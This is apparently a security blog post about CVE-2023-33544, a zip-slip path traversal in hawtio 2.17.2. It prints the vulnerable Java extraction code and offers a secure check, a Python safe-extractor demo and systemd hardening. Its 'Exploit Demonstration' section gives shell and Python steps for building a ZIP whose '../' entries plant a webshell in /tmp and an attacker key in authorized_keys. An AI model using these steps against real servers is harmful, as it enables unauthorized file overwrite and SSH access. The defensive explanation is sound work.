CVE-2023-33544 - Path Traversal Vulnerability in Hawtio 2.17.2 Exposed via Malicious ZIP Uploads

Hawtio is a popular open-source web console for managing Java applications. On May 31, 2023, the security community discovered a critical path traversal vulnerability (CVE-2023-33544) in hawtio version 2.17.2. Attackers can use specially crafted ZIP files to overwrite arbitrary files when the server decompresses user uploads, which makes this a high-severity issue.

This post breaks down what happened, the technical details, how the exploit works, and best practices for mitigation.

What Is Path Traversal?

Path traversal is a class of vulnerability in which an attacker manipulates file paths (typically with ../ sequences) so that a program reads or writes locations outside the directory it intended to use. This can result in exposure, modification, or overwriting of sensitive files.

Why Is Hawtio 2.17.2 At Risk?

In version 2.17.2, hawtio accepts ZIP files (usually for uploading or updating resources). The problem is that hawtio does not sanitize the entry names inside the archive during extraction. An entry named ../../../../etc/shadow is therefore written exactly where that path resolves, anywhere on disk that the hawtio process has permission to write.

Exploit Scenario

Suppose a web server is running hawtio 2.17.2, and a user uploads a "malicious" ZIP file. The contents of the ZIP file are crafted so that, upon extraction, they overwrite sensitive or critical system/application files.

Consider the following structure of a malicious ZIP called evil.zip:

evil.zip
|
|-- ../../../../tmp/evil.jsp
|-- ../../../../home/appuser/.ssh/authorized_keys
|-- ../../../../opt/webapp/web.xml

Because the directory traversal sequences (../) are not removed, hawtio resolves each entry name relative to its extraction directory, climbs out of it, and overwrites:
- /tmp/evil.jsp (could be a webshell)
- /home/appuser/.ssh/authorized_keys (allowing attacker SSH access)
- /opt/webapp/web.xml (altering web application behavior)

This is a simplified pseudocode version of what hawtio does internally (in Java):

ZipInputStream zis = new ZipInputStream(uploadedFileStream);
ZipEntry entry;
while ((entry = zis.getNextEntry()) != null) {
    // Vulnerable: the entry name is used as-is, so "../" components escape targetDir
    File newFile = new File(targetDir, entry.getName());
    // Write the entry to wherever the unchecked path resolves
    newFile.getParentFile().mkdirs();
    try (FileOutputStream fos = new FileOutputStream(newFile)) {
        zis.transferTo(fos);
    }
    zis.closeEntry();
}

A more secure file extraction would look like this:

// Canonical target directory WITH a trailing separator: without it, a path such as
// /opt/webapp-evil/x would pass a prefix check against /opt/webapp
String targetDirPath = targetDir.getCanonicalPath() + File.separator;

File destFile = new File(targetDir, entry.getName());
String destPath = destFile.getCanonicalPath();

if (!destPath.startsWith(targetDirPath)) {
    throw new IOException("Entry is outside of the target dir: " + entry.getName());
}
// Proceed with extraction
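To show the canonical-path check above actually doing its job, here is an added example written in Python rather than Java so it can be run as-is; it is not hawtio's code. It resolves each entry the way the vulnerable join does, rejects the whole archive before writing anything if any entry escapes, and also covers the prefix-sibling case ("<target>-evil") that a check without the trailing separator misses. The archives, the entry names and the hawtio-evil directory are constructed placeholders, and the target directory is a temporary directory.

```python
import io
import os
import tempfile
import zipfile


def resolve_destination(target_dir: str, entry_name: str) -> str:
    # Mirrors the vulnerable `new File(targetDir, entry.getName())`: join the
    # entry name onto the target, then canonicalise so '..' components collapse.
    return os.path.realpath(os.path.join(target_dir, entry_name))


def entry_escapes(target_dir: str, entry_name: str) -> bool:
    # Prefix test against the canonical target path WITH a trailing separator.
    # Without it, a sibling such as '<target>-evil/x' would wrongly pass.
    root = os.path.realpath(target_dir)
    return not resolve_destination(target_dir, entry_name).startswith(root + os.sep)


def scan_archive(data: bytes, target_dir: str) -> list:
    # (entry name, where it would land, whether it escapes) for every entry;
    # suitable for logging at upload time, before anything touches the disk.
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            findings.append((info.filename,
                             resolve_destination(target_dir, info.filename),
                             entry_escapes(target_dir, info.filename)))
    return findings


def safe_extract(data: bytes, target_dir: str) -> list:
    # Validate every entry first; reject the whole archive if any one escapes,
    # so a hostile upload never gets a partial extraction.
    bad = [name for name, _, escapes in scan_archive(data, target_dir) if escapes]
    if bad:
        raise ValueError("archive rejected, entries outside target dir: " + ", ".join(bad))
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            dest = resolve_destination(target_dir, info.filename)
            if info.is_dir():
                os.makedirs(dest, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            with zf.open(info) as src, open(dest, "wb") as dst:
                dst.write(src.read())
            written.append(dest)
    return written


def build_archive(entries: dict) -> bytes:
    # Builds a constructed in-memory archive from {entry_name: content}.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def demo() -> dict:
    # Target directory is a fresh temp dir; all entry names and contents below
    # are constructed placeholders, not real hawtio resources or payloads.
    target = os.path.join(tempfile.mkdtemp(), "hawtio")
    os.makedirs(target)
    benign = build_archive({"config/app.properties": "key=value\n"})
    hostile = build_archive({
        "config/app.properties": "key=value\n",
        "../../../../tmp/evil.jsp": "placeholder content\n",
        "../hawtio-evil/marker.txt": "placeholder content\n",  # prefix-sibling trick
    })
    result = {"benign_written": safe_extract(benign, target)}
    try:
        safe_extract(hostile, target)
        result["hostile_rejected"] = False
    except ValueError:
        result["hostile_rejected"] = True
    findings = scan_archive(hostile, target)
    result["escaping_entries"] = [n for n, _, e in findings if e]
    # Entries a check WITHOUT the trailing separator would have let through:
    root = os.path.realpath(target)
    result["naive_check_misses"] = [n for n, d, e in findings if e and d.startswith(root)]
    result["written_after_reject"] = sorted(os.listdir(target))
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Running the module prints the scan results; the hostile archive is refused outright and the target directory still only contains the benign extraction. The two design choices worth copying into Java are the trailing separator on the canonical root and validating all entries before writing any of them. The check resolves paths as they exist on disk, so it does not protect against a symlink already present inside the target directory that points outside it; an extractor that also creates symlinks from archive entries needs an additional rule.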

Exploit Demonstration (Attack Steps)

Let's see how to create and upload a malicious ZIP.

1. Creating the ZIP File

On a UNIX system:

mkdir evil
# Place a malicious file, e.g. webshell.jsp
cp shell.jsp evil/
cd evil
# Now create a zip with a path traversal in filename
zip ../../../../tmp/shell.jsp shell.jsp

Or using Python (for multiple files):

import zipfile

with zipfile.ZipFile('evil.zip', 'w') as zf:
    zf.writestr('../../../../tmp/shell.jsp', '<% ... webshell code ... %>')
    zf.writestr('../../../../home/appuser/.ssh/authorized_keys', '<attacker-key>')

2. Uploading the ZIP File

Upload evil.zip to the vulnerable hawtio interface by following the app's typical file upload flow.

3. After Upload

Check if your files landed on disk (e.g., SSH into the server, access /tmp/shell.jsp, etc.). If so, the attack worked.

Official References

- NVD Entry for CVE-2023-33544
- GitHub Issue (hawtio/hawtio#3542)
- hawtio.io

Immediate actions

- Upgrade hawtio to the latest version. The developers have patched the extraction routine in later releases.
- Harden your servers (restrict file permissions for the hawtio process).
- Monitor and log all file uploads and new/unexpected files on disk.
- Always check hawtio's official releases for patches.
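One concrete way to carry out the "restrict file permissions" item is to confine the hawtio process at the service level, so that even an unsanitized ../ entry can only reach the directories the service is allowed to write. The unit fragment below is an added example, not from the hawtio project; it assumes hawtio runs as a standalone Java process under systemd, and the user name, jar path and data directory are placeholders for your own deployment.

```ini
# /etc/systemd/system/hawtio.service (placeholder paths and user)
[Service]
User=hawtio
Group=hawtio
ExecStart=/usr/bin/java -jar /opt/hawtio/hawtio-app.jar

# Drop the ability to gain privileges via setuid binaries
NoNewPrivileges=true
# /tmp and /var/tmp become a private namespace: a traversal write into
# /tmp/evil.jsp never lands in the shared /tmp of the host
PrivateTmp=true
# Whole filesystem read-only for this service except the paths listed below,
# so /opt/webapp/web.xml and similar files cannot be overwritten
ProtectSystem=strict
# /home, /root and /run/user are inaccessible, covering ~/.ssh/authorized_keys
ProtectHome=true
# The only location the service may write; hawtio's extraction target must be here
ReadWritePaths=/var/lib/hawtio
```

With this in place the three overwrite targets from the evil.zip example above each fail at the kernel level with a permission error, which is also a useful signal to log and alert on, since a healthy hawtio never attempts such writes.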

Conclusion

CVE-2023-33544 is a critical reminder that path traversal vulnerabilities can have severe effects, especially in applications that process user-supplied archives. The hawtio team has released fixed versions, but all users of 2.17.2 (and possibly earlier) must patch as soon as possible.

Stay safe: always validate and sanitize file paths before extraction, and follow security best practices in your Java (or other language) web applications.


If you have more questions on CVE-2023-33544 or hawtio security, drop a comment or check the resources above!

Timeline

Published on: 06/01/2023 13:15:00 UTC
Last modified on: 06/08/2023 02:30:00 UTC